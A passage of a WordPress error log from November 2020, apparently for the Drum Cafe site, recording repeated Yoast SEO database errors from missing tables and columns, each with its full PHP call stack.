Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:39 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable' doesn't exist for query SELECT * FROM <code>wp_tz3c246s0h_yoast_indexable</code> WHERE <code>object_id</code> = '1' AND <code>object_type</code> = 'user' LIMIT 1 made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\Lib\ORM->find_one, Yoast\WP\Lib\ORM->run, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'updated_at' in 'field list' for query UPDATE <code>wp_tz3c246s0h_yoast_indexable</code> SET <code>has_public_posts</code> = '0', <code>permalink</code> = 'https://www.drumcafe.com/author/drumcafe/', <code>permalink_hash</code> = '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', <code>updated_at</code> = '2020-11-20 21:01:40' WHERE <code>id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Table 'vhsb42234155348.wp_tz3c246s0h_yoast_indexable_hierarchy' doesn't exist for query DELETE FROM <code>wp_tz3c246s0h_yoast_indexable_hierarchy</code> WHERE <code>indexable_id</code> = '0' made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Hierarchy_Builder->build, Yoast\WP\SEO\Repositories\Indexable_Hierarchy_Repository->clear_ancestors, Yoast\WP\Lib\ORM->delete_many, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1166', 'post', 'post', 'https://www.drumcafe.com/post-drum-cafe-wins-indira-award-for-innovation-in-teambuilding/', NULL, '60', '0', NULL, '0', NULL, NULL, NULL, 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-1.jpg', '1288', 'featured-image', '{\"width\":775,\"height\":517,\"url\":\"https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-1.jpg\",\"path\":\"/var/www/wp-content/uploads/2018/08/news_03-1.jpg\",\"size\":\"full\",\"id\":1288,\"alt\":\"\",\"pixels\":400675,\"type\":\"image/jpeg\"}', 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-1.jpg', '1288', 'featured-image', NULL, NULL, NULL, NULL, 'Drum Cafe wins Indira award for innovation in teambuilding', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '89:eadd9b1144841e2bb4729b010d6726c2', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->update_has_public_posts, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_type</code>, <code>title</code>, <code>breadcrumb_title</code>, <code>permalink</code>, <code>blog_id</code>, <code>description</code>, <code>is_robots_noindex</code>, <code>open_graph_title</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_description</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('home-page', '%%sitename%% %%page%% %%sep%% %%sitedesc%%', 'Home', 'https://www.drumcafe.com/', '1', 'Team Building, Interactive drumming entertainment, Gumboot Dancers, Boomwhackers, Conferences', '0', '', '', '', '', '25:dff44bb0d640440bdfa4424e0ab6f800', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Presenters\Schema_Presenter->present, Yoast\WP\SEO\Presenters\Schema_Presenter->get, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Presentations\Indexable_Presentation->generate_schema, Yoast\WP\SEO\Generators\Schema_Generator->generate, Yoast\WP\SEO\Generators\Schema\Website->generate, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Context\Meta_Tags_Context->generate_site_url, Yoast\WP\SEO\Repositories\Indexable_Repository->find_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>object_sub_type</code>, <code>permalink</code>, <code>primary_focus_keyword_score</code>, <code>readability_score</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noimageindex</code>, <code>is_robots_noarchive</code>, <code>is_robots_nosnippet</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>primary_focus_keyword</code>, <code>canonical</code>, <code>title</code>, <code>description</code>, <code>breadcrumb_title</code>, <code>open_graph_title</code>, <code>open_graph_description</code>, <code>twitter_title</code>, <code>twitter_description</code>, <code>author_id</code>, <code>post_parent</code>, <code>number_of_pages</code>, <code>post_status</code>, <code>is_protected</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>schema_page_type</code>, <code>schema_article_type</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1163', 'post', 'post', 'https://www.drumcafe.com/post-a-fantasy-of-fire-and-drums/', NULL, '30', '0', NULL, '0', NULL, NULL, NULL, 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-2.jpg', '1577', 'featured-image', '{\"width\":775,\"height\":517,\"url\":\"https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-2.jpg\",\"path\":\"/var/www/wp-content/uploads/2018/08/news_03-2.jpg\",\"size\":\"full\",\"id\":1577,\"alt\":\"\",\"pixels\":400675,\"type\":\"image/jpeg\"}', 'https://www.drumcafe.com/wp-content/uploads/2018/08/news_03-2.jpg', '1577', 'featured-image', NULL, NULL, NULL, NULL, 'A fantasy of fire and drums', NULL, NULL, NULL, NULL, '1', '0', NULL, 'publish', '0', NULL, NULL, '1', NULL, NULL, '58:e8cc4e87d538d9d8ef75b1717752b845', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_type</code>, <code>title</code>, <code>breadcrumb_title</code>, <code>permalink</code>, <code>blog_id</code>, <code>description</code>, <code>is_robots_noindex</code>, <code>open_graph_title</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_description</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('home-page', '%%sitename%% %%page%% %%sep%% %%sitedesc%%', 'Home', 'https://www.drumcafe.com/', '1', 'Team Building, Interactive drumming entertainment, Gumboot Dancers, Boomwhackers, Conferences', '0', '', '', '', '', '25:dff44bb0d640440bdfa4424e0ab6f800', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Presenters\Schema_Presenter->present, Yoast\WP\SEO\Presenters\Schema_Presenter->get, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Presentations\Indexable_Presentation->generate_schema, Yoast\WP\SEO\Generators\Schema_Generator->generate, Yoast\WP\SEO\Generators\Schema\Website->generate, Yoast\WP\SEO\Presentations\Abstract_Presentation->__get, Yoast\WP\SEO\Context\Meta_Tags_Context->generate_site_url, Yoast\WP\SEO\Repositories\Indexable_Repository->find_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_home_page, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, Yoast\WP\SEO\Models\Indexable->save, Yoast\WP\Lib\Model->save, Yoast\WP\Lib\ORM->save, Yoast\WP\Lib\ORM::execute
    [20-Nov-2020 21:01:40 UTC] WordPress database error Unknown column 'blog_id' in 'field list' for query INSERT INTO <code>wp_tz3c246s0h_yoast_indexable</code> (<code>object_id</code>, <code>object_type</code>, <code>permalink</code>, <code>title</code>, <code>description</code>, <code>is_cornerstone</code>, <code>is_robots_noindex</code>, <code>is_robots_nofollow</code>, <code>is_robots_noarchive</code>, <code>is_robots_noimageindex</code>, <code>is_robots_nosnippet</code>, <code>is_public</code>, <code>has_public_posts</code>, <code>blog_id</code>, <code>open_graph_image</code>, <code>open_graph_image_id</code>, <code>open_graph_image_source</code>, <code>open_graph_image_meta</code>, <code>twitter_image</code>, <code>twitter_image_id</code>, <code>twitter_image_source</code>, <code>permalink_hash</code>, <code>created_at</code>, <code>updated_at</code>) VALUES ('1', 'user', 'https://www.drumcafe.com/author/drumcafe/', NULL, NULL, '0', '0', NULL, NULL, NULL, NULL, NULL, '0', '1', 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', NULL, 'https://secure.gravatar.com/avatar/11fe64f45c58ca2662e3b7534d6aff86?s=500&d=mm&r=g', NULL, 'gravatar-image', '41:cd80de8e2e6d3ce7e7ee2d7c9d9ebcaf', '2020-11-20 21:01:40', '2020-11-20 21:01:40') made by require('wp-blog-header.php'), require_once('wp-includes/template-loader.php'), include('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-body-template.php'), get_header, do_action('get_header'), WP_Hook->do_action, WP_Hook->apply_filters, et_theme_builder_frontend_override_header, et_theme_builder_frontend_override_partial, require_once('/themes/Divi/includes/builder/frontend-builder/theme-builder/frontend-header-template.php'), wp_head, do_action('wp_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->call_wpseo_head, do_action('wpseo_head'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Front_End_Integration->present_head, Yoast\WP\SEO\Memoizers\Meta_Tags_Context_Memoizer->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->for_current_page, Yoast\WP\SEO\Repositories\Indexable_Repository->find_by_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->build_for_id_and_type, Yoast\WP\SEO\Builders\Indexable_Builder->save_indexable, do_action('wpseo_save_indexable'), WP_Hook->do_action, WP_Hook->apply_filters, Yoast\WP\SEO\Integrations\Watchers\Indexable_Post_Watcher->updated_indexable, 